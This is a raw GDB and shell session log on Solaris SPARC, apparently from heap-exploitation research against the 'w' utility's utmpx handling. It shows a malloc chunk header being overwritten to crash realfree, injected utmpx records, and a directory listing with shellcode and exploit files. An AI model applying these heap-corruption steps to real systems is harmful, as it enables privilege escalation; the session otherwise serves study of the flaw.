#6 0xff2bd9c4 in getutxent () from /usr/lib/libc.so.1
#7 0x000110dc in main ()
(gdb) c
Continuing.
Breakpoint 1, 0x00011114 in main ()
(gdb) bt
#0 0x00011114 in main ()
(gdb) c
Continuing.
Breakpoint 3, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0xff2ca560 in opendir () from /usr/lib/libc.so.1
#3 0x000113d0 in main ()
(gdb) p/x $i0
$1 = 0x428
(gdb) x/x &Lfree
0xff34284c <Lfree>: 0x00033028
(gdb) x/x &Root
0xff342858 <Root>: 0x00000000
(gdb) x/x 0x00033028
0x33028: 0x00000000
(gdb) x/x 0x00033028-8
0x33020: 0x00002009
(gdb) set *0x00033020=0x40002009
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xff2c247c in realfree () from /usr/lib/libc.so.1
(gdb) i b
Num Type Disp Enb Address What
1 breakpoint keep y 0x00011114 <main+592>
breakpoint already hit 1 time
3 breakpoint keep y 0xff2c1dc8 <_malloc_unlocked+4>
breakpoint already hit 7 times
(gdb) del 3
(gdb) r -j foo
The program being debugged has been started already.
Start it from the beginning? (y or n) n
Program not restarted.
(gdb) r -h foo
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32 -h foo
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) b _malloc_unlocked
Breakpoint 4 at 0xff2c1dc8
(gdb) c
Continuing.
Breakpoint 4, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0xff2ca560 in opendir () from /usr/lib/libc.so.1
#3 0x000113d0 in main ()
(gdb) x/x 0x00033028-8
0x33020: 0x00002009
(gdb) x/x 0x00033028-12
0x3301c: 0x00000000
(gdb) x/x 0x00033028-116
0x32fb4: 0x00000000
(gdb) x/x 0x00033028-16
0x33018: 0x00000000
(gdb) x/96x 0x33028
0x33028: 0x00000000 0x00000000 0x00000000 0x00000000
0x33038: 0x00000000 0x00000000 0x00000000 0x732f3136
0x33048: 0x7074732f 0x31360000 0x00000000 0x00000000
0x33058: 0x00000000 0x00000000 0x00000000 0x00000000
0x33068: 0x000014fd 0x00080000 0x00000000 0x52526920
0x33078: 0x00082de6 0x00000000 0x00000000 0x00000000
0x33088: 0x00000000 0x00000000 0x00000000 0x00000000
0x33098: 0x00000000 0x00000000 0x00000000 0x00000000
0x330a8: 0x00000000 0x00000000 0x00000000 0x00000000
0x330b8: 0x00000000 0x00000000 0x00000000 0x00000000
0x330c8: 0x00000000 0x00000000 0x00000000 0x00000000
0x330d8: 0x00000000 0x00000000 0x00000000 0x00000000
0x330e8: 0x00000000 0x00000000 0x00000000 0x00000000
0x330f8: 0x00000000 0x00000000 0x00000000 0x00000000
0x33108: 0x00000000 0x00000000 0x00000000 0x00000000
0x33118: 0x00000000 0x00000000 0x00000000 0x00000000
0x33128: 0x00000000 0x00000000 0x00000000 0x00000000
0x33138: 0x00000000 0x00000000 0x00000000 0x00000000
0x33148: 0x00000000 0x00000000 0x00000000 0x00000000
0x33158: 0x00000000 0x00000000 0x00000000 0x00000000
0x33168: 0x00000000 0x00000000 0x00000000 0x00000000
0x33178: 0x00000000 0x00000000 0x00000000 0x00000000
0x33188: 0x00000000 0x00000000 0x00000000 0x0000002f
0x33198: 0x62617a7a 0x00000000 0x00000000 0x00000000
(gdb) x/96x 0x33000
0x33000: 0x00000000 0x00000000 0x00000000 0x00000000
0x33010: 0x00000000 0x00000000 0x00000000 0x00000000
0x33020: 0x00002009 0x00000000 0x00000000 0x00000000
0x33030: 0x00000000 0x00000000 0x00000000 0x00000000
0x33040: 0x00000000 0x732f3136 0x7074732f 0x31360000
0x33050: 0x00000000 0x00000000 0x00000000 0x00000000
0x33060: 0x00000000 0x00000000 0x000014fd 0x00080000
0x33070: 0x00000000 0x52526920 0x00082de6 0x00000000
0x33080: 0x00000000 0x00000000 0x00000000 0x00000000
0x33090: 0x00000000 0x00000000 0x00000000 0x00000000
0x330a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x330b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x330c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x330d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x330e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x330f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33100: 0x00000000 0x00000000 0x00000000 0x00000000
0x33110: 0x00000000 0x00000000 0x00000000 0x00000000
0x33120: 0x00000000 0x00000000 0x00000000 0x00000000
0x33130: 0x00000000 0x00000000 0x00000000 0x00000000
0x33140: 0x00000000 0x00000000 0x00000000 0x00000000
0x33150: 0x00000000 0x00000000 0x00000000 0x00000000
0x33160: 0x00000000 0x00000000 0x00000000 0x00000000
0x33170: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) x/s 0x33044
0x33044: "s/16pts/16"
(gdb) q
The program is running. Exit anyway? (y or n) y
bazz@blade72[pts/3][~] ls
11111111 blade60_libc.so.1 getrsp.c o064 test
C_aps bp2 latest o0o0 test.S
Desktop carduino-server.c loader perl5 test1
Diagnostics chmod.sh local pjsip tools
Documents core mail port.h umb-scheme-3.2.tar.gz
Downloads count_lines make_shellcode.c public_html utmp_update
How_to_print_Lj2.html cs444 man public_html_backup utmpx.c
IMG_0985.JPG dead.letter man2ps.sh scheme-3.2 utmpx_userspace.c
Pictures derp mbox send w_32
Projects derp.c meatball send.c w_64
Templates derp.xcf menu_toggle shellshock_test.sh write.S
Ubuntu One find_libc mkill showrev-p.out write.c
Videos find_libc.c my_own_heap_exploit sketchbook write.man
a.out find_libc_exit mywrite src write_selfcontained
apply_actual find_write_libc.c namefs superstar write_selfcontained.S
bin find_write_libc2 nat.gif temp.bin writed
bintos.c getrsp nobackup temp.o
bazz@blade72[pts/3][~] cp tools/tmp/invoke .
bazz@blade72[pts/3][~] $PWD/invoke -d w_32
OPTIND is 1
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
(no debugging symbols found)...
(gdb) r
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symb 7:44pm up 595 day(s), 5:53, 3 users, load average: 0.01, 0.01, 0.01
User tty login@ idle JCPU PCPU what
bazz pts/1 5:10pm 32 /home/bazz/w_32
bazz pts/2 7:23pm 10 /home/bazz/w_32
bazz pts/3 7:34pm 1 /home/bazz/w_32
ols found)...
Program exited normally.
(gdb) r -h foo
Starting program: /home/bazz/w_32 -h foo
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Program exited normally.
(gdb) b 0x11114
Function "0x11114" not defined.
(gdb) b *0x11114
Breakpoint 1 at 0x11114
(gdb) r -h foo
Starting program: /home/bazz/w_32 -h foo
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) x/4i $pc
0x11114 <main+592>: sethi %hi(0x22800), %o0
0x11118 <main+596>: mov %i4, %l1
0x1111c <main+600>: add %o0, 0x1e8, %i0
0x11120 <main+604>: call 0x22514 <time>
(gdb) x/4i $pc-8
0x1110c <main+584>: call 0x22508 <endutxent>
0x11110 <main+588>: nop
0x11114 <main+592>: sethi %hi(0x22800), %o0
0x11118 <main+596>: mov %i4, %l1
(gdb) x/96x 0x34000
0x34000: 0x00000000 0x00000000 0x00000000 0x00000000
0x34010: 0x00000000 0x00000000 0x00000000 0x00000000
0x34020: 0x00000000 0x00000000 0x62617a7a 0x00000000
0x34030: 0x00000000 0x00000000 0x00000000 0x00000000
0x34040: 0x00000000 0x00000000 0x74732f35 0x7074732f
0x34050: 0x35000000 0x00000000 0x00000000 0x00000000
0x34060: 0x00000000 0x00000000 0x00000000 0x00007467
0x34070: 0x00080000 0x00000000 0x544b6439 0x0001fa71
0x34080: 0x00000000 0x00000000 0x00000000 0x00000000
0x34090: 0x00000000 0x00000000 0x00000000 0x00000000
0x340a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x340b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x340c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x340d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x340e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x340f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34100: 0x00000000 0x00000000 0x00000000 0x00000000
0x34110: 0x00000000 0x00000000 0x00000000 0x00000000
0x34120: 0x00000000 0x00000000 0x00000000 0x00000000
0x34130: 0x00000000 0x00000000 0x00000000 0x00000000
0x34140: 0x00000000 0x00000000 0x00000000 0x00000000
0x34150: 0x00000000 0x00000000 0x00000000 0x00000000
0x34160: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) x/96x 0x33000
0x33000: 0x00000000 0x00000000 0x00000000 0x00000000
0x33010: 0x00000000 0x00000000 0x00000000 0x00000000
0x33020: 0x00002009 0x00000000 0x00000000 0x00000000
0x33030: 0x00000000 0x00000000 0x00000000 0x00000000
0x33040: 0x00000000 0x732f3136 0x7074732f 0x31360000
0x33050: 0x00000000 0x00000000 0x00000000 0x00000000
0x33060: 0x00000000 0x00000000 0x000014fd 0x00080000
0x33070: 0x00000000 0x52526920 0x00082de6 0x00000000
0x33080: 0x00000000 0x00000000 0x00000000 0x00000000
0x33090: 0x00000000 0x00000000 0x00000000 0x00000000
0x330a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x330b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x330c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x330d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x330e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x330f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33100: 0x00000000 0x00000000 0x00000000 0x00000000
0x33110: 0x00000000 0x00000000 0x00000000 0x00000000
0x33120: 0x00000000 0x00000000 0x00000000 0x00000000
0x33130: 0x00000000 0x00000000 0x00000000 0x00000000
0x33140: 0x00000000 0x00000000 0x00000000 0x00000000
0x33150: 0x00000000 0x00000000 0x00000000 0x00000000
0x33160: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x33170: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
(gdb)
(gdb) x/96000x 0x33000
0x33000: 0x00000000 0x00000000 0x00000000 0x00000000
0x33010: 0x00000000 0x00000000 0x00000000 0x00000000
0x33020: 0x00002009 0x00000000 0x00000000 0x00000000
0x33030: 0x00000000 0x00000000 0x00000000 0x00000000
0x33040: 0x00000000 0x732f3136 0x7074732f 0x31360000
0x33050: 0x00000000 0x00000000 0x00000000 0x00000000
0x33060: 0x00000000 0x00000000 0x000014fd 0x00080000
0x33070: 0x00000000 0x52526920 0x00082de6 0x00000000
0x33080: 0x00000000 0x00000000 0x00000000 0x00000000
0x33090: 0x00000000 0x00000000 0x00000000 0x00000000
0x330a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x330b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x330c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x330d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x330e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x330f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33100: 0x00000000 0x00000000 0x00000000 0x00000000
0x33110: 0x00000000 0x00000000 0x00000000 0x00000000
0x33120: 0x00000000 0x00000000 0x00000000 0x00000000
0x33130: 0x00000000 0x00000000 0x00000000 0x00000000
0x33140: 0x00000000 0x00000000 0x00000000 0x00000000
0x33150: 0x00000000 0x00000000 0x00000000 0x00000000
0x33160: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x33170: 0x00000000 0x00000000 0x00000000 0x00000000
0x33180: 0x00000000 0x00000000 0x00000000 0x00000000
0x33190: 0x00000000 0x0000002f 0x62617a7a 0x00000000
0x331a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x331b0: 0x00000000 0x00000000 0x72313030 0x7074732f
0x331c0: 0x34000000 0x00000000 0x00000000 0x00000000
0x331d0: 0x00000000 0x00000000 0x00000000 0x000056cb
0x331e0: 0x00080000 0x00000ba1 0x5440c4dc 0x00000000
0x331f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33200: 0x00000000 0x00000000 0x000a6c6f 0x63616c68
0x33210: 0x6f737400 0x00000000 0x00000000 0x00000000
0x33220: 0x00000000 0x00000000 0x00000000 0x00000000
0x33230: 0x00000000 0x00000000 0x00000000 0x00000000
0x33240: 0x00000000 0x00000000 0x00000000 0x00000000
0x33250: 0x00000000 0x00000000 0x00000000 0x00000000
0x33260: 0x00000000 0x00000000 0x00000000 0x00000000
0x33270: 0x00000000 0x00000000 0x00000000 0x00000000
0x33280: 0x00000000 0x00000000 0x00000000 0x00000000
0x33290: 0x00000000 0x00000000 0x00000000 0x00000000
0x332a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x332b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x332c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x332d0: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x332e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x332f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33300: 0x00000000 0x00000000 0x00000000 0x62617a7a
0x33310: 0x00000000 0x00000000 0x00000000 0x00000000
0x33320: 0x00000000 0x00000000 0x00000000 0x2f320000
0x33330: 0x7074732f 0x32000000 0x00000000 0x00000000
0x33340: 0x00000000 0x00000000 0x00000000 0x00000000
0x33350: 0x000003ce 0x00080000 0x000007a8 0x5438d560
0x33360: 0x00000000 0x00000000 0x00000000 0x00000000
0x33370: 0x00000000 0x00000000 0x00000000 0x000b3a70
0x33380: 0x74732f31 0x3a532e30 0x00000000 0x00000000
0x33390: 0x00000000 0x00000000 0x00000000 0x00000000
0x333a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x333b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x333c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x333d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x333e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x333f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33400: 0x00000000 0x00000000 0x00000000 0x00000000
0x33410: 0x00000000 0x00000000 0x00000000 0x00000000
0x33420: 0x00000000 0x00000000 0x00000000 0x00000000
0x33430: 0x00000000 0x00000000 0x00000000 0x00000000
0x33440: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x33450: 0x00000000 0x00000000 0x00000000 0x00000000
0x33460: 0x00000000 0x00000000 0x00000000 0x00000000
0x33470: 0x00000000 0x00000000 0x00000000 0x000000a0
0x33480: 0x62617a7a 0x00000000 0x00000000 0x00000000
0x33490: 0x00000000 0x00000000 0x00000000 0x00000000
0x334a0: 0x2f330000 0x7074732f 0x33000000 0x00000000
0x334b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x334c0: 0x00000000 0x00004027 0x00080000 0x000007a8
0x334d0: 0x543f3195 0x00000000 0x00000000 0x00000000
0x334e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x334f0: 0x000b3a70 0x74732f37 0x3a532e30 0x00000000
0x33500: 0x00000000 0x00000000 0x00000000 0x00000000
0x33510: 0x00000000 0x00000000 0x00000000 0x00000000
0x33520: 0x00000000 0x00000000 0x00000000 0x00000000
0x33530: 0x00000000 0x00000000 0x00000000 0x00000000
0x33540: 0x00000000 0x00000000 0x00000000 0x00000000
0x33550: 0x00000000 0x00000000 0x00000000 0x00000000
0x33560: 0x00000000 0x00000000 0x00000000 0x00000000
0x33570: 0x00000000 0x00000000 0x00000000 0x00000000
0x33580: 0x00000000 0x00000000 0x00000000 0x00000000
0x33590: 0x00000000 0x00000000 0x00000000 0x00000000
0x335a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x335b0: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x335c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x335d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x335e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x335f0: 0x000000a0 0x66616b65 0x6d616e00 0x00000000
0x33600: 0x00000000 0x00000000 0x00000000 0x00000000
0x33610: 0x00000000 0x61616161 0x7074732f 0x2f2f3300
0x33620: 0x00000000 0x00000000 0x00000000 0x00000000
0x33630: 0x00000000 0x00000000 0x00002328 0x0008000a
0x33640: 0x000107a8 0x000186a0 0x00002710 0x00000004
0x33650: 0x00000000 0x00000000 0x00000000 0x00000000
0x33660: 0x00000000 0x00056261 0x7a7a0000 0x00000000
0x33670: 0x00000000 0x00000000 0x00000000 0x00000000
0x33680: 0x00000000 0x00000000 0x00000000 0x00000000
0x33690: 0x00000000 0x00000000 0x00000000 0x00000000
0x336a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x336b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x336c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x336d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x336e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x336f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33700: 0x00000000 0x00000000 0x00000000 0x00000000
0x33710: 0x00000000 0x00000000 0x00000000 0x00000000
0x33720: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x33730: 0x00000000 0x00000000 0x00000000 0x00000000
0x33740: 0x00000000 0x00000000 0x00000000 0x00000000
0x33750: 0x00000000 0x00000000 0x00000000 0x00000000
0x33760: 0x00000000 0x00000050 0x66616b65 0x6d616e00
0x33770: 0x00000000 0x00000000 0x00000000 0x00000000
0x33780: 0x00000000 0x00000000 0x61616162 0x7074732f
0x33790: 0x2f2f3300 0x00000000 0x00000000 0x00000000
0x337a0: 0x00000000 0x00000000 0x00000000 0x00002328
0x337b0: 0x0008000a 0x000107a8 0x000186a0 0x00002710
0x337c0: 0x00000004 0x00000000 0x00000000 0x00000000
0x337d0: 0x00000000 0x00000000 0x00056261 0x7a7a0000
0x337e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x337f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33800: 0x00000000 0x00000000 0x00000000 0x00000000
0x33810: 0x00000000 0x00000000 0x00000000 0x00000000
0x33820: 0x00000000 0x00000000 0x00000000 0x00000000
0x33830: 0x00000000 0x00000000 0x00000000 0x00000000
0x33840: 0x00000000 0x00000000 0x00000000 0x00000000
0x33850: 0x00000000 0x00000000 0x00000000 0x00000000
0x33860: 0x00000000 0x00000000 0x00000000 0x00000000
0x33870: 0x00000000 0x00000000 0x00000000 0x00000000
0x33880: 0x00000000 0x00000000 0x00000000 0x00000000
0x33890: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x338a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x338b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x338c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x338d0: 0x00000000 0x00000000 0x00000050 0x00000000
0x338e0: 0x00000048 0x7a736d6f 0x6e000000 0x00000000
0x338f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33900: 0x00000000 0x504d3130 0x00000000 0x00000000
0x33910: 0x00000000 0x00000000 0x00000000 0x00000000
0x33920: 0x00000000 0x00000000 0x00000187 0x00060000
0x33930: 0x00000101 0x5144b175 0x00000000 0x00000000
0x33940: 0x00000000 0x00000000 0x00000000 0x00000000
0x33950: 0x00000000 0x00000000 0x00000000 0x00000000
0x33960: 0x00000000 0x00000000 0x00000000 0x00000000
0x33970: 0x00000000 0x00000000 0x00000000 0x00000000
0x33980: 0x00000000 0x00000000 0x00000000 0x00000000
0x33990: 0x00000000 0x00000000 0x00000000 0x00000000
0x339a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x339b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x339c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x339d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x339e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x339f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33a00: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x33a10: 0x00000000 0x00000000 0x00000000 0x00000000
0x33a20: 0x00000000 0x00000000 0x00000000 0x00000000
0x33a30: 0x00000000 0x00000000 0x00000000 0x00000000
0x33a40: 0x00000000 0x00000000 0x00000000 0x00000000
0x33a50: 0x00000000 0x000000a4 0x62617a7a 0x00000000
0x33a60: 0x00000000 0x00000000 0x00000000 0x00000000
0x33a70: 0x00000000 0x00000000 0x74732f31 0x7074732f
0x33a80: 0x31000000 0x00000000 0x00000000 0x00000000
0x33a90: 0x00000000 0x00000000 0x00000000 0x0000023a
0x33aa0: 0x00070000 0x00000000 0x54554c5e 0x0006b034
0x33ab0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33ac0: 0x00000000 0x00000000 0x000f766d 0x37322e63
0x33ad0: 0x732e756d 0x622e6564 0x75000000 0x00000000
0x33ae0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33af0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33b00: 0x00000000 0x00000000 0x00000000 0x00000000
0x33b10: 0x00000000 0x00000000 0x00000000 0x00000000
0x33b20: 0x00000000 0x00000000 0x00000000 0x00000000
0x33b30: 0x00000000 0x00000000 0x00000000 0x00000000
0x33b40: 0x00000000 0x00000000 0x00000000 0x00000000
0x33b50: 0x00000000 0x00000000 0x00000000 0x00000000
0x33b60: 0x00000000 0x00000000 0x00000000 0x00000000
0x33b70: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x33b80: 0x00000000 0x00000000 0x00000000 0x00000000
0x33b90: 0x00000000 0x00000000 0x00000000 0x00000000
0x33ba0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33bb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33bc0: 0x00000000 0x00000000 0x00000018 0x62617a7a
0x33bd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33be0: 0x00000000 0x00000000 0x00000000 0x74732f32
0x33bf0: 0x7074732f 0x32000000 0x00000000 0x00000000
0x33c00: 0x00000000 0x00000000 0x00000000 0x00000000
0x33c10: 0x000003db 0x00070000 0x00000000 0x54556b71
0x33c20: 0x00007555 0x00000000 0x00000000 0x00000000
0x33c30: 0x00000000 0x00000000 0x00000000 0x000f766d
0x33c40: 0x37322e63 0x732e756d 0x622e6564 0x75000000
0x33c50: 0x00000000 0x00000000 0x00000000 0x00000000
0x33c60: 0x00000000 0x00000000 0x00000000 0x00000000
0x33c70: 0x00000000 0x00000000 0x00000000 0x00000000
0x33c80: 0x00000000 0x00000000 0x00000000 0x00000000
0x33c90: 0x00000000 0x00000000 0x00000000 0x00000000
0x33ca0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33cb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33cc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33cd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33ce0: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x33cf0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33d00: 0x00000000 0x00000000 0x00000000 0x00000000
0x33d10: 0x00000000 0x00000000 0x00000000 0x00000000
0x33d20: 0x00000000 0x00000000 0x00000000 0x00000000
0x33d30: 0x00000000 0x00000000 0x00000000 0x00000018
0x33d40: 0x62617a7a 0x00000000 0x00000000 0x00000000
0x33d50: 0x00000000 0x00000000 0x00000000 0x00000000
0x33d60: 0x74732f33 0x7074732f 0x33000000 0x00000000
0x33d70: 0x00000000 0x00000000 0x00000000 0x00000000
0x33d80: 0x00000000 0x0000041a 0x00070000 0x00000000
0x33d90: 0x54556dfb 0x000a22b2 0x00000000 0x00000000
0x33da0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33db0: 0x000f766d 0x37322e63 0x732e756d 0x622e6564
0x33dc0: 0x75000000 0x00000000 0x00000000 0x00000000
0x33dd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33de0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33df0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33e00: 0x00000000 0x00000000 0x00000000 0x00000000
0x33e10: 0x00000000 0x00000000 0x00000000 0x00000000
0x33e20: 0x00000000 0x00000000 0x00000000 0x00000000
0x33e30: 0x00000000 0x00000000 0x00000000 0x00000000
0x33e40: 0x00000000 0x00000000 0x00000000 0x00000000
0x33e50: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x33e60: 0x00000000 0x00000000 0x00000000 0x00000000
0x33e70: 0x00000000 0x00000000 0x00000000 0x00000000
0x33e80: 0x00000000 0x00000000 0x00000000 0x00000000
0x33e90: 0x00000000 0x00000000 0x00000000 0x00000000
0x33ea0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33eb0: 0x000000d8 0x62617a7a 0x00000000 0x00000000
0x33ec0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33ed0: 0x00000000 0x74732f34 0x7074732f 0x34000000
0x33ee0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33ef0: 0x00000000 0x00000000 0x000003b9 0x00080000
0x33f00: 0x00000000 0x544b9876 0x000a2490 0x00000000
0x33f10: 0x00000000 0x00000000 0x00000000 0x00000000
0x33f20: 0x00000000 0x00000000 0x00000000 0x00000000
0x33f30: 0x00000000 0x00000000 0x00000000 0x00000000
0x33f40: 0x00000000 0x00000000 0x00000000 0x00000000
0x33f50: 0x00000000 0x00000000 0x00000000 0x00000000
0x33f60: 0x00000000 0x00000000 0x00000000 0x00000000
0x33f70: 0x00000000 0x00000000 0x00000000 0x00000000
0x33f80: 0x00000000 0x00000000 0x00000000 0x00000000
0x33f90: 0x00000000 0x00000000 0x00000000 0x00000000
0x33fa0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33fb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33fc0: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x33fd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33fe0: 0x00000000 0x00000000 0x00000000 0x00000000
0x33ff0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34000: 0x00000000 0x00000000 0x00000000 0x00000000
0x34010: 0x00000000 0x00000000 0x00000000 0x00000000
0x34020: 0x00000000 0x00000000 0x62617a7a 0x00000000
0x34030: 0x00000000 0x00000000 0x00000000 0x00000000
0x34040: 0x00000000 0x00000000 0x74732f35 0x7074732f
0x34050: 0x35000000 0x00000000 0x00000000 0x00000000
0x34060: 0x00000000 0x00000000 0x00000000 0x00007467
0x34070: 0x00080000 0x00000000 0x544b6439 0x0001fa71
0x34080: 0x00000000 0x00000000 0x00000000 0x00000000
0x34090: 0x00000000 0x00000000 0x00000000 0x00000000
0x340a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x340b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x340c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x340d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x340e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x340f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x34100: 0x00000000 0x00000000 0x00000000 0x00000000
0x34110: 0x00000000 0x00000000 0x00000000 0x00000000
0x34120: 0x00000000 0x00000000 0x00000000 0x00000000
0x34130: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0x34140: 0x00000000 0x00000000 0x00000000 0x00000000
0x34150: 0x00000000 0x00000000 0x00000000 0x00000000
0x34160: 0x00000000 0x00000000 0x00000000 0x00000000
0x34170: 0x00000000 0x00000000 0x00000000 0x00000000
0x34180: 0x00000000 0x00000000 0x00000000 0x00000000
0x34190: 0x00000000 0x00000000 0x0000002f 0x62617a7a
0x341a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x341b0: 0x00000000 0x00000000 0x00000000 0x74732f36
0x341c0: 0x7074732f 0x36000000 0x00000000 0x00000000
0x341d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x341e0: 0x00007497 0x00080000 0x00000000 0x544b6438
0x341f0: 0x000e757d 0x00000000 0x00000000 0x00000000
0x34200: 0x00000000 0x00000000 0x00000000 0x00000000
0x34210: 0x00000000 0x00000000 0x00000000 0x00000000
0x34220: 0x00000000 0x00000000 0x00000000 0x00000000
0x34230: 0x00000000 0x00000000 0x00000000 0x00000000
0x34240: 0x00000000 0x00000000 0x00000000 0x00000000
0x34250: 0x00000000 0x00000000 0x00000000 0x00000000
0x34260: 0x00000000 0x00000000 0x00000000 0x00000000
0x34270: 0x00000000 0x00000000 0x00000000 0x00000000
0x34280: 0x00000000 0x00000000 0x00000000 0x00000000
